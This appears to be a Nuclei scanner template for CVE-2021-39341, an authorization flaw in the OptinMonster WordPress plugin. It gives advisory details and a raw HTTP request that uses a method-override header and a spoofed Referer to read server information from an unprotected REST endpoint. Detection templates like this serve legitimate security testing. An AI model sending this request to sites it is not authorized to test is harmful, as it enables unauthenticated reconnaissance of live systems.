id: CVE-2021-39341 info: name: OptinMonster Plugin < 2.6.5 - Unprotected REST-API author: iamnoooob,pdresearch severity: high description: | The OptinMonster WordPress plugin is vulnerable to sensitive information disclosure and unauthorized setting updates due to insufficient authorization validation via the logged_in_or_has_api_key function in the ~/OMAPI/RestApi.php file that can used to exploit inject malicious web scripts on sites with the plugin installed. This affects versions up to, and including, 2.6.4. impact: | Unauthenticated attackers can access sensitive system information including PHP version, server configuration, and plugin details via unprotected REST API endpoints. remediation: | Upgrade to OptinMonster version 2.6.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-39341 - https://plugins.trac.wordpress.org/browser/optinmonster/trunk/OMAPI/RestApi.php?rev=2606519#L1460 - https://wordfence.com/vulnerability-advisories/#CVE-2021-39341 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2021-39341 cwe-id: CWE-285,CWE-863 epss-score: 0.44317 epss-percentile: 0.97623 cpe: cpe:2.3:a:optinmonster:optinmonster:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: optinmonster product: optinmonster framework: wordpress publicwww-query: "/wp-content/plugins/optinmonster" tags: cve,cve221,wordpress,wp-plugin,optinmonster,rest-api,disclosure,unauth,exposure,vkev,vuln http: - raw: - | OPTIONS /wp-json/omapp/v1/support HTTP/1.1 Host: {{Hostname}} X-HTTP-Method-Override: GET Referer: https://wp.app.optinmonster.test matchers: - type: word part: body words: - "PHP Version" - "OptinMonster" - '"functions.php"' - "Server Info" condition: and # digest: 4a0a004730450221009300e018459b74a562c35d9a1b6e4921fb506368354fba9c9f92b556886ac28702206d92673d2d71d4b02ec61e43c7f78851da7241666245858ad7d63adceed28a4e:922c64590222798bb761d5b6d8e72950